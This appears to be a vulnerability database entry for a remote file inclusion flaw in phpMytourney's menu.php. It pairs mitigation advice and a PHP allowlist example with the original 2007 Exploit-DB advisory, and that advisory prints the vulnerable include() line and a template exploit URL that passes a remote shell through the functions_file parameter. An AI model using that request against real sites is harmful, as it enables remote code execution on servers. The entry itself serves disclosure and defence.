Vendor: phpMytourney
By: S.W.A.T.
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: phpMytourney
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Not specified
2007

phpMytourney (functions_file) Remote File Inclusion Vulnerability

The 'menu.php' script passes the 'functions_file' parameter directly to include(), so an attacker can make the application include a remote file. Because PHP executes the files it includes, this can lead to remote code execution or other malicious activity.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before it reaches any file-inclusion call. Keeping the software up to date with the latest patches and security fixes is also crucial.
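
One way to apply the validation described above, as an added example rather than phpMytourney's own code: the request value is treated as a key into a fixed allowlist and the resolved path is checked against a base directory. The function name `resolve_functions_file`, the `functions.php` file name and the temporary directory are assumptions made for the demo.

```php
<?php
// Added example (not phpMytourney code). Names and paths are hypothetical.
// Vulnerable pattern from the advisory, shown for contrast only:
//   include($functions_file);   // value arrives from the request

/**
 * Map a request-supplied key to a fixed local file.
 * Returns the absolute path to include, or null when the key is not
 * allowlisted or the resolved path falls outside the base directory.
 */
function resolve_functions_file(string $key, string $baseDir, array $allowlist): ?string
{
    // 1. Exact allowlist match only: the request never supplies a path or URL.
    if (!array_key_exists($key, $allowlist)) {
        return null;
    }
    // 2. Canonicalise (symlinks, "..") and confirm containment in $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowlist[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary include directory holding one file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
@mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'functions.php', "<?php // demo\n");
$allow = ['default' => 'functions.php'];

// Constructed sample inputs: one valid key, then values that must be refused.
$inputs = ['default', 'http://example.invalid/x.txt', '../../etc/passwd', 'functions.php'];
foreach ($inputs as $in) {
    $resolved = resolve_functions_file($in, $base, $allow);
    printf("%-30s => %s\n", $in, $resolved === null ? 'REJECTED' : 'include ' . $resolved);
}

// Clean up the demo files.
unlink($base . DIRECTORY_SEPARATOR . 'functions.php');
rmdir($base);
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) adds a second layer by refusing URL wrappers in include() even if a check like this is bypassed or missing.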
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  phpMytourney (functions_file) Remote File Inclusion Vulnerability
# Author  :  S.W.A.T.
# Contact :  S.W.4.T@HackerMail.com
# S.Page  :  http://script.vanta.ru/download.php?id=1178&clas=0
# $$      :  Free
# Site    :  Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net
*******************************************************************************
Vuln Code:

include($functions_file);

[[Remote]]]

http://[target]/[path]/menu.php?functions_file=[SHELL]

"""""""""""""""""""""

# I Love XmorsTEAM
# We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T.
# Iranian Hackers & Security TEAM
# Xmors Digital Network Hacking & Security Team

# milw0rm.com [2007-09-06]